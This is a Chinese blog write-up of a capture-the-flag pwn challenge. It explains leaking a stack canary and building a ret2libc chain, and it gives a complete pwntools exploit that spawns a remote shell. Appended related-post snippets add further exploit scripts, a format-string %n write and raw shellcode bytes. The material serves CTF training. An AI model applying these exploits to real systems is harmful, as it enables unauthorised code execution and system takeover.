[攻防世界 pwn]——pwn1(内涵peak小知识)

最新推荐文章于 2025-10-15 11:06:37 发布
原创 最新推荐文章于 2025-10-15 11:06:37 发布 · 812 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

[攻防世界 pwn]——pwn1

peak小知识

这道题目的关键就是泄露canary,通常我们泄露canary有两种方法,遇见printf函数,并且有格式化字符串漏洞的我们可以直接计算偏移利用%{offest}$s,打印出来。当然也可以用 % {offest} $p直接打印出canary 的值。
遇见可以利用的栈溢出gets函数,如果有puts函数,或者printf("%s", **)的我们也可以直接泄露出来它。首先我们要清楚canary的位置,在ebp + 8的位置。并且第一个字符为’\x00’,目的就是为了截断防止泄露出来canary,我们可以将其’\x00’覆盖为一个非零的值。这样就可以打印出canary了。该题利用的就是这一思路。

解题

还是先checksec 一下,开启了full relro意味着got表无法修改
在这里插入图片描述
在IDA中,查看一下
在这里插入图片描述
将里面的字符打印出来而已,区别是前三句有回车,第四句没有
在这里插入图片描述
将读取的字符转为数字
在这里插入图片描述

思路

利用输入1,写入可以泄露出canary的字符串。
利用输入2,泄露canary
再次利用输入1, 写入我们想要执行的rop链
利用输入3, 退出程序,同时执行rop链
接着按照我们的思路就可以了
就变成了ret2libc问题
leek出一个地址,找libc算偏移。找system, ‘/bin/sh’。执行

exploit

from pwn import *
from LibcSearcher import *
p = remote('111.200.241.244',35224)
elf = ELF("./babystack")
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = 0x0000000000400908
pop_rdi = 0x0000000000400a93

p.sendlineafter('>> ','1')
payload = 'a' * (0x90 - 8) 
p.sendline(payload)  # 等价于p.send('a' * 0x88 + '\n')
p.sendlineafter('>> ','2')
p.recvuntil('aaaa\n')
canary = u64(p.recv(7).rjust(8,'\x00'))
payload1 = 'a' * (0x90 - 8) + p64(canary) + 'a' * 8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
p.sendlineafter('>> ','1')
p.send(payload1)
p.sendlineafter('>> ','3')
puts_addr = u64(p.recv(6).ljust(8,'\x00'))
log.success("puts_addr +: " + hex(puts_addr)
)
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
p.sendlineafter('>> ','1')
payload2 = 'a' * (0x90 - 8) + p64(canary) + 'a' * 8 + p64(pop_rdi) + p64(binsh) + p64(system)
p.send(payload2)
p.sendlineafter('>> ','3')
p.interactive()
攻防世界 pwn1
10-25 1084
1 题目 2 分析 流程很简单,提供三个功能,store print quit。store功能存在明显的溢出点: 接下来就是利用溢出点,将代码转跳到system方法执行即可。所以接下来的就要通过构造ROP将相对地址打印出来,然后溢出one_gadget.exp如下: from pwn import * from LibcSearcher import * io = remote("220.249.52.133","38178") context.log_level = 'debug.
攻防世界pwn——pwn1
qq_62076255的博客
12-21 679
做题记录
CTF比赛PWN题解题思路()
bdfcfff77fa的博客
10-15 1010
运行程序如下,输入1,提示no username用IDA对程序进行逆向,需要输入admin才能继续程序漏洞点是在输入用户名的地方存在栈溢出使用gdb进行调试,在main函数处设置断点单步调试(ni)到func函数处,进行步入(si)单步调试到名字输入的位置输入足够长度的字符串计算引起溢出的字符串长度,有两种方法,第一种包括admin所以长度为56将返回地址覆盖成程序中我们想让其返回的地址,这里我们通过IDA查找危险函数。
pwn--攻防世界 pwn1
A13837377363的博客
04-04 757
canary一般是以'\x00'结尾,但是由于小端序存储,我们会先遇到'\x00',这里使用sendline自动添加的'\n'掩盖'\x00'。思路形成:先读出canary,再读出main函数的返回地址,计算出libc的基址,因为只能填入一个地址,所以就想到one_gadget。观察保护和源码,有canary保护,并且只能溢出8字节,也就是一个地址。我使用的是python3,可能由于python版本问题,我运行的时候要将。然后是读取main函数的返回地址,与这个类似,就不赘述。一个非常便捷的工具。
攻防世界--pwn1
qq_73149934的博客
02-22 653
canary,ret2libc 注意:只能打通远端,且libc中的systembinsh没用,用onegadget打通,在用onegadget时,注意rax需要为0,通过汇编看出选择3.exit退出时rax清0,可以onegadget Exp she_i386_20=b"\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" she_amd64_30=b"\x48\x31\xd2\x48\xbb
攻防世界 -pwn1
TedLau的博客
04-22 1043
0x00 前言 首次做到跟canary绕过有关的知识,就准备写点东西记录下。 64位,保护几乎全开了。不慌,慌也没用。 0x10 分析 运行可以发现几个功能,就是说:1选项是保存你将要输入的内容,2就是打印你之前输入的内容,3就是退出。 0x11 ida分析 main函数 在main函数中发现了canarycanary的值在程序每一次运行都是会改...
攻防世界pwn——level3
qq_62076255的博客
11-05 890
攻防世界pwn——level3
[攻防世界 pwn]——string(内涵peak知识
Y_peak的博客
02-19 920
[攻防世界 pwn]——string 题目地址:https://adworld.xctf.org.cn/ 题目: peak知识 mmap函数作用,mmap主要是将文件映射到一段内存去同时设置那段内存的属性可读可写或者是可执行详情请看mmap & mprotect 在checksec看到开启了canary和NX,应该和格式化字符串有关。 在IDA中看看,发现侧边栏竟然有mmap函数,这个地方应该是关键点, 找到函数位置,想要保证该函数执行,必须保证前两个函数执行完毕,并且a1 == a1[
攻防世界pwn——stack2
qq_62076255的博客
12-18 864
攻防世界pwn——stack2做题记录
攻防世界pwn——string
qq_62076255的博客
11-05 859
攻防世界pwn——string
攻防世界——pwn1
weixin_44319142的博客
04-08 3011
get_shell
攻防世界 pwn1 wp
qq_43409582的博客
11-06 551
0x01 先看保护: 除了PIE全开了。 打开ida分析明显的栈溢出漏洞,然后再看一下题目逻辑1是输入2是输出3是退出 因为有canary保护所以要想办法泄露canary,回头看那个栈溢出漏洞,发现可以利用先发送0x88个a过去 后面会自动给你爆出canary,有了canary之后,就简单了,所以思路就是:先利用栈溢出漏洞获取canary,再利用拼接的方法将前面的填充补全之后就是rop了。这...
攻防世界pwn难度1
weixin_63282980的博客
11-05 2004
攻防世界难度1的题目WP
攻防世界pwn第一题
Greic的博客
11-26 2319
emmmmm,本人是一只刚刚学pwn的菜鸟(看写的题目也知道),这也算是自己第一次写pwn题吧,想保持一下,因此便有了此篇博客。话不多说,我们开始。 首先创建生成模拟环境,下载附件。 查看保护类型(什么都没有,233333) 习惯性拖进IDA看看,由于汇编才刚刚开始,所以还是按F5看C语言源代码算了。然后,果然,运行就能给flag 最后链接靶机???(不知道叫啥,就叫这个算了),然后就这样出来了,就是要稍微注意一下,链接的时候需要把55775前面的:去掉。 好啦,就这样写完了,...
攻防世界进阶区pwn1
weixin_45461609的博客
06-06 385
拿到题目checksec一下,发现开了canary保护。 分析源程序,也很容易找到溢出点,题目开了canary,很显然v6就是canary,s与v6的距离为0x90-0x8=0x88.题目得逻辑也很简单,输入1进行read操作,2进行puts,3退出。 那么思路就很清楚了,通过read填充0x88个a,然后通过puts打印,因为puts碰到\x00才会停止打印, 那么就会有疑惑了,众所周知canary的最后一个字节为\x00,那打印0x88个’a’之后不是直接停止打印了吗?后来用gdb看了一下发现cana
pwn1
weixin_45427676的博客
04-09 535
首先在vm终端checksec一下查看一下pwn1的保护机制 可以看到有canary保护,canary是一种用来防护栈溢出的保护机制。其原理是在一个函数的入口处,先从fs/gs寄存器中取出一个4字节(eax)或者8字节(rax)的值存到栈上,当函数结束时会检查这个栈上的值是否和存进去的值一致,若一致则正常退出,如果是栈溢出或者其他原因导致canary的值发生变化,那么程序将执行___stack_...
攻防世界-pwn1-Writeup
SkYe's Blog
05-13 516
pwn1 考点:栈溢出,canary绕过 基本情况 程序实现功能是往栈上读写数据。 保护措施 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) 栈溢出 ...... while ( 1 ) { menu(); v3 = my_input(); switch ( v3 ) {
攻防世界 PWN
最新发布
12-12
攻防世界PWN有多个题目及对应的解题资料,以下是部分介绍: - **new_easypwn**:检查保护机制可知,该程序为amd64 - 64 - little架构,有部分RELRO,存在Canary,开启了NX和PIE。`readelf -h`显示ELF文件头信息,包含Magic、Class、Data等内容,可用于进一步的攻击点分析[^1]。 ```plaintext healer@healer-virtual-machine:~/Desktop/attachments$ checksec hello [*] '/home/healer/Desktop/attachments/hello' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled healer@healer-virtual-machine:~/Desktop/attachments$ readelf -h hello ELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 Class: ELF64 Data: 2's complement, little endian Version: 1 (current) OS/ABI: UNIX - System V ABI Version: 0 Type: DYN (Shared object file) Machine: Advanced Micro Devices X86-64 Version: 0x1 Entry point address: 0xa00 Start of program headers: 64 (bytes into file) Start of section headers: 8648 (bytes into file) Flags: 0x0 Size of this header: 64 (bytes) Size of program headers: 56 (bytes) Number of program headers: 9 Size of section headers: 64 (bytes) Number of section headers: 29 Section header string table index: 28 ``` - **签到题**:这是较为简单的题目,无需复杂操作,直接连接远程服务即可获得shell并拿到flag。 ```python from pwn import * r = remote("111.198.29.45", 59457) r.interactive() r.close() ``` - **新手区某题**:利用`printf`返回字符个数的特性,将`pwnme`的值改成8。 ```python from pwn import * pwnme_addr = 0x804A068 payload = p32(pwnme_addr) + 'a'*4 + '%10$n' r = remote('111.200.241.244', 55843) r.recvuntil('name:') r.sendline('233') r.recvuntil('please:') r.sendline(payload) r.interactive() ``` - **[GFSJ0469] string**:题目有一段背景描述,“欢迎来到我的世界!我是一个巫师……可能会帮助你更好地了解它。”,但未给出解题代码,推测需结合这段信息进行后续分析[^4]。 - **pwn - 200**:通过泄露`write`地址,返回`main`函数,计算偏移找到`system`和`/bin/sh`的位置,最终获得shell。 ```python from pwn import * from LibcSearcher import * p = remote("111.200.241.244", 33327) elf = ELF('./pwn') write_got = elf.got['write'] write_plt = elf.plt['write'] main_addr = 0x080484BE payload = 'a' * (0x6c + 0x4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(8) p.recvline() p.sendline(payload) write_addr = u32(p.recv(4)) print hex(write_addr) libc = LibcSearcher('write', write_addr) libc_base = write_addr - libc.dump('write') system_addr = libc_base + libc.dump('system') binsh = libc_base + libc.dump('str_bin_sh') payload = 'a' * (0x6c + 0x4) + p32(system_addr) + 'junk' + p32(binsh) p.sendline(payload) p.interactive() ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值